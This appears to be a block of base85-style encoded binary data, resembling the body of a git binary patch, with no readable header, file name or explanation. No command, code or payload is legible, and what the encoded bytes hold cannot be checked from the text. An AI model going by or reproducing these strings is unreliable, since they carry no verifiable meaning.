zufBGpHu6j5KmK^b<7=Kj{ukx{{O6N@zWv0NKIPZd4Xu0T*MGQ0`6o`SIuXomoT~i&
z`+vQ^$Agg?<v;e=zQ-z`ZT_3`@4090J>5T9{h;!9>=?P@)n{INRQcVzkM3T2eV;!m
zf9OzcXyTA(yvl#+r9m&v+3x&-@~f*esxMe!ZczTEm%erBj9=V-tMdQ;_lmzi`*1-Y
z<)@@%r}RHB{W|6U;SbOJLF+N}P37Ny`;6Q7T=v!y<(HIPQ8MxE^A0FKFK>0;+?IRZ
zQGP+evjx{3t{AQS#KhFZ%+ASYD*yG@pL=~kf8T#7|G@{hJou-@AAhL)s;ZQ#^fjRh
z<)3@*_;afs@4Hs{KHmV}w5iWst^6%p25))#mwy_g{KJP294<fqn6CU!K6&Gl>y2%T
zm4C+_58m<d#qYeU{CV?!Ft6WpU6(5Vm%qH}m#<Xyx>or;d%n=~(q;ZG%J18^s&DA{
z_`fTE$&%ws8iqZ7oAMhPN*d0)f6Za#XJib_n3Z?IOyzIfIDO-1ul{$Q@{5bFDlU5O
z{4bQhY+2c|UpzMMBIVcAoK@5F!=E%NzhA%Fe(&!tG?i}{*BFn?SkPDbEiKzx-f(>~
zO8JjGa`cg=pM4Qh{(=RMEcjy2HRF{(X3V%TW!EnImGT{qV#oQ5{y+A<1Td=VdVeMv
zWrCOt6m49pqedGPZHAx*MV$vTVS<C8K!v)n1QZp4LZaBZ1P3&aF;!byvD?qKw8hq1
zY^_^q%>c@xB8Vbds{sWP!s-HHo&WdUchAhrV@48Mm-gSAygB!NcR%;OyPS8I;6*~m
zjr-fU>)%*WAoTd-#~r_7a?fQ#AAkJr$B*l7JT3IeCpSI0^xEn>gbo=pV91Y;o4Z`-
z4}NgV4>qsA@GhaJo?3hA(Z36QL+F?>bz?d-EvXc`W5@eD{?R3QrqC%<R!({Tmm6Ld
z+NDdR%LCskx?5;4__g2#*VKGRsMqWF28(?Wp$iwDweXvbKl!21&6^+ET>9M?-V^$d
ze_Z;HA3gB<0YZQAi@*P3)X5|2h1S*O*PR&a@SxC(F8cVQPnLdXiO`20y6&Nuca&Zw
z)Hy(S_0<zzJ@56{ZlPzL_1IbAd%rnB=q<OraLYq~-n>@m-FNr6d(6D!HV9q4`mWUn
z9(|%%=m{r`KVi+S=PeZam%nWNOX8|qtAzgXkN5nsbGN>K7kcB3f4TA2_g?>+&_RQ)
z8T8!Ik8Bbe4(EltL}y+p^rMfOKYFQfZ<)}NlKPULZ6Emuq1(3oWZPL)3l|B!<dS`t
ztY3KN+d_v9tr+_K6Mwf@=r4cyr(fRY8~zWWn>O9QDR=DBCZS`;nqvz#FS}9bbI-l@
z+_U3u$QAmHZ_NM3*dJWmUub>(*Xu9a__OZ`efQlF@BV$-FGdPI@x)0dHjFRZCv^Y*
zRr~*X&c<?~0|s;(aK)G(pDgtI-=F;b4;p&iBDA`CY4!c{H|-I6<dKC(mYme-JfSmZ
zc9~f;JMVF!fBMshf7%_q?NXr|Hax$fa`?&_Li6*>@+X~l;+;ZIKKb^OTPiQ!D0KAb
zAC5kM*P@|9Uw{49*SG%aFBb@%JNL(PyY(0_P3Vt)H2O!2J`P+VbocIsyMJ=Qw$Vag
zc%k%#>vlf$E1{>KKI`;zpXl!sI(+zT!$0)@>GwjXPd{_|kjIZ%A$0QOHzq&*+Yeq4
z+N;+Gz25le<jq2((X*r98a4Y^q1RqJ_S$6^&YvZ8>eT&HH_q7pe?rU38p{5;X3~10
z_ubd=zOMHiF<a=$m6a=B{L}Ma75eL6KmKdus4G7Zx^CSc*YzFn)-QyP8ujp~Z?r79
zOz5Bgyz|dH!r$#9^psPkpK{Ev`}7q0)1UVL>8#bKdxf5K($tf-U)Ou9(7t^;_dWHB
zdqxRey!gV!x9t1D6GHdxdvo8P&sslFsK?{;_`7<GgkFC6@XP<?{pI^YAAb1ShvzT;
z#_2+DzWLFc2QGU1RG~*7-Sg;iy^bF%bkCkw_r%U^x=rYN?_KrYQ`3KSgU~zgTz}`A
zKiT)F(4wLTiY|IGa-7f$FWh|L3vb?XK<Mv(|D)drF1qx`LYFT;dHKaFr)?M7xpSy<
z?a)&n7JC2vN8aDb%#8`X?6T7@>wnWvJwl&;dc)HzFQ0Oq(B|fN^HC#TY7pAH_x9fV
zU!Ix}I&Ip;({6wM<o!Zt&AM^c>j%ya3f;A9@2=)fADt-l*=OH<_7~SrEEM{cuSCBx
zd&C)Wq20UB>wd>ihg~jo)vB9Tt$yaOM+n`x@vj?ix_Z@pLMKf4^@J;5dZ(ArMT^c~
zG~uHk{!VCaZl~PBf+J55`ps{Kzd7?OkG&%_6goO|d`0cGLhrh3?OpHv{J<kZAAR)a
zkDhY=z*?bao;ml-0e26%Ug%%{y85qA+<a3<p^3z4iSl*-cdyXFgD)Ta%befr5c<wL
zSHAOj{MVC(9(7drqlSI`*ug@7_Or`=_S02gcMBaq{tx5(CDxoJG!R%6_~9p`=LoH;
zdZp^#XB$5fx^ri8=lgj(juBd3enff4zV}6iKK9tm$MVhy|5~VNo@DlZsNgR`yLKJa
z^^s8VlS0?7{ngs5`n>m?&|{AscI>>%y8lM#1s614@XBjdyM*3w!?QO`T=CkGLi6&9
z@*-z<F@#Q<^v_AZ{X@f>LZ5nS-BWK3`SwJiD^^^;V)@g5J4xu4EkD?D;hl?D3w`<J
zufBZFKW3~G+NaMkea^gc`Z%GpXMbz<lMBx7E_BYE-_5DWAG$?oaq%O?*VGQG7JBv7
zH(&jB;F)`bwzMp6`N1VyZW4OWJ*VCin$vlK(8AMRY`pgw_rUXh^V%o3O?>c*k@J7@
zy<c_u?zvxUcyqxymmawCm|M?Z|9{*2zddYew~kLda?^~zUE}-srHhZa{)4X@@!#I@
z!!>)i-hSObzuNET%g%nj!ympCEB(Cg(}-fAa-trrJk|*swH~ccwtc<*@*8q;@9UIh
zL7H>WV>3g7f;BHY_(|*_m8-tm9|U6^L+-&KkX*HTrnME5?zZhYmHT_?>WkQW%XK+i
zizQ0&7KW4Y_yn}kY-_`~M$7srU+L;Q)#Y4gm3cK*hOH!i9aj$Mk$7ZnkleNA#J{DJ
zE;uRGkH}~!F3C6=kA&lgo{H|otpeJ;FT}cE{L8*KRmxN45kKjYwvZD*$fKZTO#ME>
z3IH`y{kDH^>SoP<?L9@D@pp%f7mxD|YODVM{4&f|WeKw?bP)UdMcB_Do9YEU{g>D<
zY6pGI0?u;al769mU@v;R)9-5kc8q$b+be)^*^D#&HQK))c6LQx+0~6OFifZaN3{QO
zcE`{={f`Bfsr+4j%VVKM)IM}BFB1QPXNsF%yeC;62k8v6IvhpZf?eXDVLHp6PKN3F
zSFYU)(ZPu^>sq2hzvZMV<<inP{qt%JTmm9Xi4M8H<lM5dcJEECkp+uLLQo|my_Sf}
z+Sxwgi%i!JGrM-K?b?B#tz#|T>Md%)z0E<-4#5k02C55E4%Fg&xxY>B39nNnAFcaU
z4MMdR$*XN5jf@5NgdH7;E%Zivy<h!4R@)yT>-()c!6RnN(5M8Uk~KI!$P>Q=hqf4r
zMvs9rd#5!NK!tGRSE2#H3UfDBI^f*UwOtbHx&(IPl%Z*BU9Oj3p0<v^=Bqq3c|~GV
z7yfSR!jpg&uWSnJp0;)<RN&RRu6gi}lX4opffc7GT}c=84PJ9)pasqn+SwBK(s1B4
z97dQpotq#MO&;@2M1WqJk+}-;mPO3nkwnrLNv!n|O1kov1q+^fHE(6#SnnUWa3on(
zSL7had^OQ<d}3RUkyoEsdwjFcSlLMEgq7PAasrN3G-3^x<h`omLEaXa3(Xg%tyQsZ
zIx^ARA@+Xn*t*=rmi)Z8&4sb`C5h&vjrgnw`4Yz7FUV^)UonoF^)TN@b79}3x=vH4
zp*40*G#?Xt|44-GPHZVK^48GrC5h%^WAB&I^itoWW=-RZfV2D(%{U*skrBapE^YT3
z@%fLkJB+=5iE-5Yhxx|R%lv5^N$~i;MB_0kuo8G-@C8r5o!I14F3`FdX3KSfBnr%z
z_a-b8i+L_=P9O93)t++Gv$`U=pdz-%S1@A*cCuV`jdjrXP`$6|<>XMQIj7>d9;LVL
z#5-DTKe9G%$ZdDnXoT})3@eP-MXYkJs+{IO3{w8&V#a0`T3Ug1stt2ex^QA*7T<b|
z;s^E9wa@Yav)j+c#)k*g4+=Bv@qohY_QQi}_d)$=|6z8+?1n=(%x=FQeoOFx`axla
zJswb)-SFl`d~o3MB0ew7c`&m@%Y!)&@xdMsDB^>?7xs8SVa`K*Uc`rh;TII<Jec!f
z&Vw2D@LPfh6!F0xeoOFx!i?}Ol>-k*B&(d#zzpj5=dfMJljDIA56pg;fx{k8j%xTl
z@K*$fMWB{LnBk!a?%)|ujtBO5V1_>raM<HPe8?_`kA6@;DA<e#W>CMs3%vXAbb&Vr
zAwXe|2WC*%BYq#AE{NNQ2WI&5051Y9f;-sb>4La@cwmM<*duP3;SS2p9|WTJh`V9N
zzX#OgW&+u_Fryrc!|a9`xChkZRsbD=Gj4JV7puV%IQ-+ufn6@19N6XJf!Pf+aQMdq
zpI-c+fIXldP*)zzC}0n$Cl6k|h|i1oKs}(YJeYxdKs|Yg&x`oHhz}J0bKoBj%%JcO
zJH+Qje4y|TJD7pPKOV#f1(q`<Ze0^$R*8a{RxTfYI)iow4y_kvFU($;p{ybz^V~jW
z01qfL12g>N0qqRh892=F?}2|jEL!9U#YT?0++COvJfO@J%q|~rA82RL&cI>z!t90F
z3$tQ8id8Y+-GvOm14?GV4F7mQJA-xx4m12CZcvz+0Vrg|VgLbqhG6vLDS<txy99QA
zJfLn+H*oSG%^+unVF!Ocxa$ns8UB3m=L78w+PTE?j$a?*_km#u4i6|82s3Q_c;L<r
ziuhs11B&=zR#E#9zYhiC14E(30}2Mi414%P{656*L;Nt~0Y&^UBk@#dA@IY0iveCQ
zC>}s8pB&h;TykI!vj=8SJgg?<99k4rX}xav!{f~Z#RGfwGQeI{O4!2;e|eyI7%d~{
z$cXTCMErc!IwI~IJRJeUJ_q*rx(154VGlDX9xl=2y1|Z!KL<}o#GQkuBjV1%1N$7<
z=fFM(_HYk>cwi4RDB@NbP`P(AImizGm~=O4FaT9F$h{BtFuP#}4m;SpTz(*UT*aVx
zTz=T%aTS9W!yVY}#shmF>|usKJg|qE?9mMj;?BiGc2P(`*5)D(*mLiR54rcj9%eVp
zz+ne_SB@Y4@Z=!wTs%35I~Pw5!p=n;u=l~<2YVmvVTM0Eu!kAxR0^eqf3(a@4jxcd
z5NK)v_+jwF-Vb}2@qoe}X3LtbKAn0zr@}cNP!A~V;Q$XP?BV`YnDKzZ9%itWtOrH-
zUW88;u$EaBz(cm;0fl`r?3qQFb702f@xwhHP=pWvr^1W}6yd|{hkHDru!s9oVa5Xr
zdzjr?9nk7zsC=jfs2x!51J<7=?voo%Zphz}zXRlCkbHLo{&u)`XyQKkz{v;l@du(b
z?vwGC@6Ol6-Eg4czz+O@C=EIZ^obohc)dp*b@b8s`99xQzH-bl#~yp!amOEj;)y4p
z?DwB`+UcjCaYnapXP();`!~K32=wUDv*-Eemz7<3;YAl+d~q<?w{JLHUS3hrzkf73
zaNy;aUvb5dAy-~GY}i#-U31N~*Nz%Bdi0nv*Iz$w+)X##eDj0}lO|1>QeAz^Ew|nF
zo$uU!`(1a{)Wl*lX54d+Y0jK^-+lMr|KNk)|Ng954?Q${_D_EDv!DI^=fC*HFMl~_
z&ToG^ckb_h|A#+3{`kCkfBy4d{_@mQ&p!LybMxmv|9m2`V8NnAix)3h^3qGMys~`x
ziWRF?z46BC)o;D^_S^5g^WJ+64e!6de*K0GP5An?dGoeyJ9d2dA=W|cYH8WKcmMta
z2R<*^AKzn<{hb0m6|oYfv+jqZ7S+QQ(wL%ZAE=Q!W3SqF&8#2pCTX`F`Qk))SMEUW
zEzRBG&i5HOh>zjT(rzTYI-VtXUoQ5*-s72=U)V?Xm3D=@dhPZ&Qrx{8K^RQu8jVw)
z^=Zlt%g<8w*aP8H_E_)LsbGXqoR<?1YP^OZ)G>JMvdSPqD7F*Iy)xlP!h`mUkYS#Q
zc<nMwsUw_z5EpYdn5nM7L%hE-rR&USm|0#<H5EW6{4U@O=X=_Nsz=cOP~)>%ub`w(
zJ_<eEzoT(gPk{Xe4|;t3T1s>;!ASRV=V7Y;h|r?ab?ewsH&K2u#WiKz4cApo>2Xfa
z^Lw1<8Z&mvh$%OXc7?)&)s3JN$BY><Y1HH!s%}$I<+!nx%9|a$Vaf;zEz8M4H;=uU
zH+V{*h;~Hv1QpiUF|E)Hm}|t8aihjeymbV9r{Y(>7|s+xV<i6=3n)c4Q9obTFP1Zv
z6CY;5DZICKKT+f4Cr6ti1Af@yUhqd8cyDcfRF@aSp}bt&|HX#0eh9wUhEwz-_&SY~
z@aVX`JkbGaOBVNjxS^u8cB0HZ)o&V?`W<oLQolt8CgDhZo$YWh^>vX0m-_mS1DAT)
z{{6H68M5=ecBUimy1CR`$bOgNFbwCZFv3&HYG2dMWT6GCdsgWrSDS@g=mfNdGyZI{
z^WNG&>#JQk%>h_4Oh-0dLG8a@UPK*;UsEByprQW~0fZ{aq04oam^GF33+)43^meCb
zY5#VNdZ$~q<C$dVCECBAo@~n2O)2z7{4z{u{s(FQjW)m3I{l9YMxF-o*wsijHc)dd
z(r(##S-#~ls1runIU$K(>JN)2Q&pL&JFB;>U{b$M{;`^7^6%C1YH2ql0H^=4m7_<D
zolx0k*?Et{xXW-73s|e5qCvF5`7WMCBl5+|aSo18wwGGc^uPPz7Tb!BpqG>gJ+(hq
z2_{wXYHy2`LptX9I}0_cB%wI#=A($Y+FZt1Y+HG;WtaPSJ4DQl5z|v-g%<Y|Ma*1o
zI`AH}K0mg|chy4SVc<Mh<qcCRT{n!G%HF#8^eNrtzncqJl`|=yrqGSH<q+<yL5#m)
zG@@-w5bZmJhVKKbANkpyv%FcSWsH9v^sdYE3y0+Ur}8{(Ka6F>p!m-79GF;6G~a)h
zHBKj#O_AT9<(QiBW*YNaZGQUglD5|xQ;W&Uo1{Ja88GtZi%W}UKV!RNYlkpdpW}{D
zcVpWvPg90e?N3=1YdoC;%j#^6J5$s{<7}&(D${wK=fe@lwxU#-!_XIxZob4y(cxKe
z`eQiaU)2v_w`6f2%Yx4W-kG0Rv^qo6UxN}4YI8SDUDEjB6~-}|=bT&8tCwqZ^>yc*
z8z?DpofGZblRruqpsojhO4WFG;-sn@CQg`=Wsu#cV&I4=6DCbY8*rU+t|OX!+oUSX
zJfV{Mz`+O73>-W-s>auHoVWt4H+_U)I{lJUb}=kt8H;w+_QYA1GIr%U0V?9`9tF4R
ziG{O|5}acTD!R9indLnu&T<y_mq1TNoNtHVA%alEm^Q&LB?#qof4K!KocU_8hS<qb
zHryWm_ccz8V{!@qaU1?s8}8RQ<K-ht<_dyKeLUQ;@i|kfCI`+z)%kJ^l~o(ew^izm
z<U6P}&j_Gt`pve0Z0k&FbkkF&J+RJEEA0#W1uDLe#95|x)uIh7Kf7|8yTg)UI{ix%
z<hOf<-f5PxvenMn9P4zSVuPsFaEb;sX0J1J7t{`Kpuwj6Ha)cwJak$@gH1iE{U2(q
z&G$mmWb^KNJrkJ0?I>WG#@cJNf4@CY=%xGwz6}~Wb>_cC`yVC_HFf&ufQV%p)b>K2
z(G^no!urGBPy9>$$rLxk7^D+4NmI6MT{8I3HrB4!742CDW>Y#_DWo%W2h}}bjXM3Y
zluJwF^j|r;vRz~C(jI~H{7Q}Ncvm=Dp5so3=yqM4u`a9-rXdMIm5lUQ+rY)&ZyMi>
z)=h5V5tRGY={Fo0FXzgO*ydqIyf_>m=^0>dZ#71aaPWP55q8h63C~zsF#ShJ#()|1
z1-1W&2;!G}Lh-yvEP-viID|%>R1*rkf-9Z$L6*^?LYxW^4B?=IPz1+n_#!3_vTS79
zu&Fl4akf8%gAqbe=!(rvW>c`Xm}fv@@k8yn-63<WI{C78&>nMB1a}$vDq@YWE36&2
zKY~jr3u_1M#o48B9I73;uXfM@WdNFN8isxYXLv+$Rr*pMry7Z^YZ)*j87YXYjNDY;
z5^=AxOo<Bjixsg0Ed|qyP=hM!Za>yrQCHp}>fQ!)_vG7U%2DaLJK|n(ak8P{seZ{w
z5^GL;=7Q#&z-uY9H*W>Z^#xB2q<vljhNT5hT}cCOGHWPo_5_yFS|N#bzPtqru?Jv7
z5SVh0o3a8gs}fKwO>tB4ko-f*<Tj0yQke(NqDVq0nZRpOFzP6uk`V6qL`g(hPEoKO
zcYucYg9C_K6%6)EtAZ&pH-)ghK4dnraLT}BluZaXNEIfwfW<lBbqHmkiVJ1MLSS(r
ztYGc9y{g<;S|Rfl7LJkFET!gWLDh~-hRxTT`bjbEMsig#t<}Y}jK#z<LSj)Qw;%07
z*)7neRrMWC+^l*D7HDR`AsK=shAQf+^1Xq^in_~i+xfbP`(0I<p@?-%QKYid{So)>
zi<4{3m67D~M3b*JzxEcC)biSI^4DBI6xHllt@G6$TYH_dFUS7vP*Ehq<Z##_c5buM
zw?VaIy2hr9W3cwl)uQktbG6BA)YMvRd>8p%ZaME*3iE7GgJ**pJR5XC{sZpZKDl4M
zwb)2G+T?@hJ{E3k3<+q}o;er2WSaYMZfKwTC>{di7>VWKR2+L`!Y|H(yQH(IR1*em
zQWJ>G>#!-4hae}*w8HhEP7v!0`&StwU!uDdcAey+;BRQ$>HbXJ$2xJ5i#ze7b%!b8
zOJ6=h<8*JIi@>N9-Sc_OmJV77{&S5>2@C#!#+gSd!KZ6n%0Te%YTQ0&qTNJ|OM1oq
zSdGiOBlx8{KYm6EC3uC#i!3;W_tki@1HVY)-5t2dlS>?UFYUgk125IM-+^nR>oDdt
zW5<vBvdm;$F6N6xk!>y`@1x{b7n>N>d&;^OOd*ygr~{m<an>XHm3k)i;S7yyHfz@|
z*Pon#wsFSK@@1G#=WX?W9{e&))-$_$QU_RO2cc(P?TYPDru@rTc92dm^Urp{nSZuh
zbRzW;TBSDY_zyLg=?B+No-lx~IuoiwJ=pD)z%$Kd3blW~_9sNrFJ^vM%)~#rlVO}V
z)YR#p-yJgXuS`3XdP4rSXD;)IPQUP<ZDS_?+2%6abyql0r(1}V*V*PWgLL{i*Rw09
ze@L`S?UR`jYoellExq-7p1#T<aQ=DiUUM(^n=l<gm6#y<icadgftKh;a1nx;$RgFp
zWJL@1t2#8&fAbNFL=Gw8Z{MmI78&~$vc5g?a`qw8kBo-il8Fz(vFMk6s!*I|@!8A6
zoh>U9n0YK@;kx1|SLvTjV>7-J_OX-7J1}l~kp4Lxg3DE!1rKJy2V}u1@3kteHK-C}
z+eTHE;CIYeHN+}CSaNHfxsIq+yTI|GjHP-Lgkn8m-US~<5Q?~c4CE&W#kQSKO0|1`
z+n4){YbkfhpR<k0CU0D$nG(?+**?;*)Ie!_v-Q!xln5Qv8Gm;jrn8T3tAF;f4Aa?1
zivL6Pkr!zHAg$CZtxRcyGyVNxm8p+hp}qLiUX@PxC-7)!7-o(Dnr_$BImU4MzXtAD
zw}aZf5Wi-ql#}#t;$QGgaWf2AH7k82-!=A!PXF2Z$f-I**D^4ha`G=*A6cf;Ki=k-
zTBrZY>qei~)An)wkbPt?+{&y}+vR=Z$Y8C4il+NW<H`Z%Vq83fi`j<`z@8@Dh_cVR
zb|$vD*oYt3O2}78A)n{i*zH9lU6Hyd#dMycg6Y3Pn2`&+Lq}oXjDJ+0S;5ccuPRAY
z)ZD2=GZgyy8W}qUBR-1dycK4LNaaFfX4j%f@`dEWsJo>ixhVF2haSG#p~+fb^Y7Xl
z)+%ErKFnKT?XkiN&g@Z}6WCrGPDXllFRK27VP2zBP?$k9Q*0N_v|YeL_OefEZ{Hq*
zAL-k_#)^@auc*6MlzavEPwTr^Lir<ecC<&j!XW>f#sG>($P>SDliyCo`E4fL$b!34
zFP|2m@Ld!ENtVyHhY+EtBu&u?W4*BV@y}<$xj}-8?(KcQpCA;QqE_wee_0<d<*G7^
zAI%OiW}S!6)@^J=yKHYCe~mLD9gY*u*2lNif3`ke{2y)~U+YY0mh@-q<Hf&U`x7F4
zq?kuT!>C%-L73<2_(wu-S5E)g`uK)_v5)6QJ1Y66+}=JusN<KlBvxn#*S~Cie2ezq
zwmyE$SXn@Ks6HM`yW2evenzh)WFCSlBdx#b?c!Ays)I-GzJD-g!}!|MsVIu?FjM(~
z1P9q-Et@)g+=!pls@E^pz5e{78V0O7@`CBVgEo5M?M1$V>A!&%J@wfYadhPIo<&h!
zBzQYN7!4`%NAQ`&`jST-jIgLM;jnVm%mFT38o+*k9r|qc`yGwifyvsA&A&N};9i<J
zRDxS;1s9wdsO=p1(5SsK8SRCXRzGT(Cvo&qoT2Y8v-SO4bZEQ$Ber=e596JuGLLZh
zA*?VOe@ve%jQcX8`1qv0o&{TR4tGt*_5=&=kD+BZSA^<DV^q|s$b2K#&_P{ah>u;l
z;rKN!u)dSIA{-y!37PLdtnbL!wY%F&jI=trBeTKB;sM9)jMRlZ!w^&Vir9;JvH3;y
zNRTQHf5CJU?}GLi>2+dJ!QCAYCkI(Uvb~H&JSfCt`1$3nB+~6fe6YK^D9Z1AL--TX
zLo;O0s0$S(`N=L4!fD0Pi2J=*ONWAcrz5h8O3%F*rP)7k7Fr)OQ(r6f$4zba;_GGl
z<EI$Zm(Rpne(HRUA3x<wDL#g_M!b1T6q5Q{s*RDlo+ld^fF?_E>T~Ikq9N9|No1`M
z-|%9)JKTDCwoiD4wfR{-<|Wi8KH6J4e(Xzq%u6muz^dS5`~6in#P$cPMsNr`jQsSY
zfW}144>9H?SBH_ISEEozDyFg!UDZdCqr*`7u5Lbyr7^PLDc?+f7EK~^C9Bp!-+k4A
zybtkFI?}79dTsNohM7R6Fkb>~D#nie6rT!lnzv#Zclw9&>TO0ZjyDj?lnx)2;Y5{)
zfe*@|ycIShd@M-$Sb*XE$szEEgLP!IV8+`hbtHNSvsq}=4MEKSzXyfTCV<g<aN}oR
z^aAj9l1eFrX}G1vs(~|T@$ajFxAsfdzCe9b3pfJe!iV87Xa`O6ED9v8%eOF`EYZ{@
zt?djgi}AbZVnh-0OZP}sjzjo%go?)SCz3AKbdiR@7rY{HSDkMaE=s-WRirC|&%ss^
z=U7Dy4)<8qpo@5WZ66fz9u)CX9Fq|?S2q2Ge&myL*M}nRJr^g}efr1c<noZYf)%#0
zu=YsN`b1lMM#%a?-833OhcV>|n*%&-`ZC^GZ)^J4q<o>O?b9xmOpcikXYLh&Kbd=-
z%W+J4?$xLDw{3OrWhj4AZh<??<cndA!$Y-~2~uHYJ+my7KhK@}t|v=iDwKnNn8eS1
zE~h^XIHJ!@NljW?{5!spbG~Dj^Qy7{b{d{cbGcqw@bWA;zX36P30IX5Fpk+Wg|Fv?
z7_4de@0hWrBh);x?GwWcf?qXl)Ip^J!alp3C*Cp^DRH^(Rlf(%0as_iPi2LGVs*32
zg`d(mhsG>Tkt=U=;38kn_N`v-n3QnjUAaq-c^R*Lz3*cLph#Gz68;ssN*&~0;}ZVW
z^bGYi{YioD?fFuc_@R3~3;6@3qfOzmSI=u%r|{ou_e>j=g!40vOI;9rmd2gm{A)EX
z@<(xhyT*l2f>&wWuVPKd8`69%a^QV5UhKeSuUB^mex7z;;=p@q-1*JFhsH%NE9va6
zaj7qYpP})fBYdwezmNmZ(Ky>gDhX$wE~uylr|=ey4|3oiYkY_U-=Xng4t%S|r5;JV
z8+H0eI^4JDbdGW0A8TCNa|vgQ#>YF{Z_xN82mXP^s~q?`jZbyp?`ZsX2fkY4eh03N
zsXG)Uozl+zx3AqO(d~rrK{sz=%qlZ#q`)7_uRX9mpjO%od9TmVxUN1hS!$9aUcsI5
z^F3vlhwDGv+6{@nMk3Z!SN{}BnG>;K3b8a^3Q4GR!kB+nF=zg>t=-tJ^M5FrRX>F3
z<Ov|x3H;cUK{?%KTf5=c{{4<HB>e(sTe}g|{^yB9O`ZO41fG$9TFxTvE%`^eqxhHl
z!~F1_bgJz-{u-TO_Hmi~XZtQSN!MR#S0sEV|FX%fWY6iL)^1?PV_&*)$nz3Q%gWmS
zT}tXAG7(f6vCFJdcdy1a<0{hLkSbwL+Dg1q7O1c5lZ>@oQgH7XC@V@>ZtPHDz8sFb
z6D_$$Vt=j?ukc`7CwxM_V!koJTn^C-BqueDZ9wIISa=JjvyUFoYh%H^Z{ej-E0dK(
zOntuM><??8Lq#VJ=(Z2j`XW4qjr1Og_bxK(!Ur(JE#y@2#Hbr-IkMp17%l6#0T7pZ
zc~Z;4wM2ySlJr_`uI{#*Q;WluYgs9ND;I|+HWV7>j^-l*_2JZlam?n;)uFuQ5R%jf
zcBa;hd-Fb22;#XlIiPMJ#Uw>h_ujk@``7g>!2I1GF?%BM)dvi7RqVi#w+>FtK6^eL
zaqqe~xzT(vl6)z#wJ=y)s<l|IU0Pd-l)O~im%kzN-INp2(@n^Hn{G-&wO1vh?w2So
zspdTU#^BBuI*^makxEEJz{l>KRhIziS=|Y9)81-hKymYV#xs1IAnhtDjzYvz5;}{;
z^wf|tH|EO)PxUN=%w*Lb%%;7oHYkBfMXyBldngAiJHNW9do$+4ZyDx7oR<hq)2WyN
zr#MrX5~6_fDLuHZT~K4=cFLc{=9Cc(raSVp>Jm)%dls3imAK?@NI3ax)ZKAFGu<#>
zizSaNxaV}dqM_QsNhGU(-PIQ+%^j-Fak1#XTIX&J9#r2T>!5%G<XDpWrV}jkHAPT^
zn*2%^*x7W3rFpHX8#FAbYE?=sAP7TL`LO7!J4Y&`MJT9fC$%%6xH%ZD98%QDP@>F8
zT@_0U<rz8)1=FYCsoRf5aV;$`c*=8ZB>Cd1B+JWK)ey>C9IU+)0@-(~-)50PuGGD0
zDay!v5t5L4X!LIGipt*4R6y2fBpb}dtZCa&886gYRJ03QS4Id!UZOB0R|!L)^@+Cj
zw5I7w3UZ`jUZ#W~Wf|nZkuO*X(hj)?`z0S9_S@}QOBRKDnV(E!AcvAu)VOoUv{O!j
zP*uPG-zckKcV(AVC>{d)_pRsGoo?!LbV^ikSnK(J$-;nQQFELkbMhAnLUDY;Iwbfl
zdJrMFjAf41V?}2;GWQhssktT{LJ2;|GP)*coaEEy_C0kvv~v{>!xEW?jJ1gIIYzr@
z9;pQ9?aNerSEvM+foWF@PT?PGv*cUcZ`QcHJA(gRhwpcUBQlsG2mZKrU+lnT|3Y^M
z{yXhn#+nlEuQZ<GH~i7=ry4JFgma@VzupdfjK+fwe3ZsR4*Xh;M;!Q78jm{gVH%h6
zm-OFA4b%{er1)Q<3w)RZ@1yan9r%SBAL+n*X?%<WKVReH95@dQr5bOMRC>B;-0#4(
z@xOk5gtTvxUtPV#n01a_tLHd#waZSR^y}4TdB3vFu@jo_+IfmN<LCRrFm*LcxofNc
zY;){II{rzi5G{=}S=r{;JWHDD5na!j|MtwWd(tt~;m)x~X#Z9y>0c-RvdytaYXAPU
zSEZBk6FA!(yGHvTCk{1r`p-7UUcm`5l++XQFVh^E`Oz$<^OS1T@ypuJ_Rg`(bp1Wt
z{Sl2i{fC-kPgH9^+rBO&(5wCHLL#<G8&n*!ul)?;w0NuwvG#dK%ule*dvL_PiTk{x
z@i|2gz(X|tWYKKURx@wz_Qu@6Ys5Ph8JPQeDmWRApM*I>8Rm1nx%>ljlH0NHpx5{!
zZ`C-g=ZHkjrBQPMmr4{H$;F(`V;agY_HZmKL$Oo=lY%k?**nVF0k;(UIXzN~NrGHG
z;)_=P!@yb(wal|mk0B=pE7al<EE#QnFgzn!m1mep6@vHZ<sOIJh5I>=z16rR>-WZf
z+)LXJduekT+V_c2l`h|j&wlKkSqPeG4=fXv{rlm;4He&Y`xslsaHj$HF))W}@Ap7g
z>ZP-N-&0uI$J!ab@3q=H%Xxx~sdwx2@-<}M1ovxP#zfk97-Nbr_x=qjKgpl756ZTG
z;{n~NmuQb{Qt4Ov5a}DTjUl4Wh;%qkxVsM1IfiJfe~tkdrleCx;}ZXe>cg|`-?-J8
zP#v%n?hl;Zm9rn5svY{ZKOw?DF^`6ZPM!W|YyXGp!?UgJtk(>ca+3aA;ukzq+$wE4
zL5I7xQ}$nQjAK_iTPY};oP3Q=|M-+kOXKv9ts5gIj~z9pt!q0=&p*H2=d}dcplB6T
zG<~lSmMNO(!`1!`p4DQmLg$UMHZD@`D4DG4B&O=h=5wE8hMxBz7`5OtQg<#LHu8sk
ztv50QJ-cd_tCtwDSCUQRQ4r648`f>|RP|CSvhL5_(q>;j48_l862ddKRCf$)G3K+m
zY@QIQRH=)Y+atM3XY~5#9j8+8UQzi<`Y6Yb=A`va^HD-Zw|~0V&{?GNrH|%>Ocl0a
z{?p1>)5CC*&T*{FQ!wKmKscx*Qu#^9OzOzGZL(NY`I^mfOR{Paj<xyTP<U{^5Zj-7
z=aNWV@hk2sSb{-^7nkN-<O*VS#J%$&b^IGEd_`<uhdYn1s2g9@A%d?Gk;MAk#i1f4
zeuz|76?KioRdGdnZM~y!#8lB1M!J0%apRzxWGeE)SWB|{7@Ls^e}#;CjwxCQog1Mx
zKQ?VI<A07nR?-Rvz8!0DM=P5L^jd#Mzers15;EYZxg%<>!(CAwRH%CEtEvWI9+vSA
zFgI)0=GPFs>!Uf{)>uqz9#YY3%N;!q6_&PVSwzjXAI)k0S_BJ(vql{@*W+By;*i;B
zm&StCN~PYlO2|F?_PxMgJalyRgsN(PuX9SzDLFfEezh_N?(9)=PD#&h77U-POdLC~
zm=0H7x)HB|ZH<`PpVO!H`6uQ1BXgh6$uGl>9V5ROtH`hdEOl-?d}me6-)BE&%RJU{
zBW7ufSyicMCNASG!B5e+n1!+rrF)rb2&KG<xTv&_V?sU25=%|9j}`TYPn-JzN`G*^
z2xmHDlk5ELV@p-0z((Mayh58&)zD?aV_EQTWx;0w?~D|Q5<bk$;{MqzxXbneRNXvD
zokEFYC|wiA;#|seOU`puPte-)E$xW$W3N+Iy|j5s)u_n|D6>wj)VrBf50+)aQ{O9w
